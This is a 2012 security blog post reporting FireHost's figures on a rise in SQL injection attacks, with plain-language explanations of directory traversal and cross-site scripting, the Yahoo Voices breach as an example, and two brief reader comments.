Think Information. Think Security.
New evidence for “H@X0rs rulez” messages shows a sharp rise of SQL injection attacks measured by web hosting company FireHost, which reports that between the first and second quarter of 2012, the number of SQL injection attacks against FireHost’s clients rose 69%. SQL injection attacks use false SQL database commands entered into a site’s Web interface to obtain data not normally available for public consumption - like passwords, personal information, and the holy of holies for hackers: credit card data. They are rapidly becoming the weapon of choice for attackers, FireHost Security Operations Center Manager Greg Tatum said, because that’s where the money is.

SQL injection attacks at FireHost rose from 277,770 in the first quarter to 469,983 in the second quarter of the year. That still ranks SQL injection-type attacks as only the third most popular type of attacks hitting FireHost and its clients, trailing directory traversal and cross-site scripting attacks. Directory (or path) traversal attacks try to trick a website into providing access to files on the Web server that would otherwise be restricted.

Like SQL injection attacks, they work by attacking the Web application itself, but they are also much easier to execute - which explains their top position on FireHost’s list. Once access to a Web server’s restricted files is obtained, intruders can have the run of the website, and can make it do nearly anything they want.

Cross-site scripting is almost as feared as SQL injection attacks, but instead of working on mining data from a website, these attacks flip the vector around and go after individual users. Cross-site scripts embed script tags in URLs and when unsuspecting users to click on those compromised links, malicious Javascript code can be executed on the victim’s machine.

Even though SQL injections are not as common, they grab bigger headlines because when they’re successful, they can cause a lot of user pain at once. The 450,000 Yahoo Voices accounts' password breach on July 11 reportedly used a union-based SQL injection, for instance. Unless evidence of the attack surfaces after the fact (little clues can help, such as nearly a half-million account passwords suddenly showing up on a hacker community forum), SQL injections are usually very hard to detect, which is the way profit-motivated hackers like it.

Defacing websites will always remain popular among a certain set of hackers. But the days of the loud and obnoxious attacks being the worst we have to worry about are coming to a close. Now it’s the silent but deadly attacks that Web administrators need to fear the most.

Cross-posted from: Read Write Web Enterprise
9/4/2012 03:09:55 pm

Thanks to you! Finally I got some stuff for security. I was searching for some material related to matter for web security. Very useful and very informative. Thanks once again and do share some more posts if you have!

9/30/2012 09:07:13 pm

All the contents you mentioned in post are too good and can be very useful. I will keep it in mind, thanks for sharing the information keep updating, looking forward for more posts. Thanks


Leave a Reply.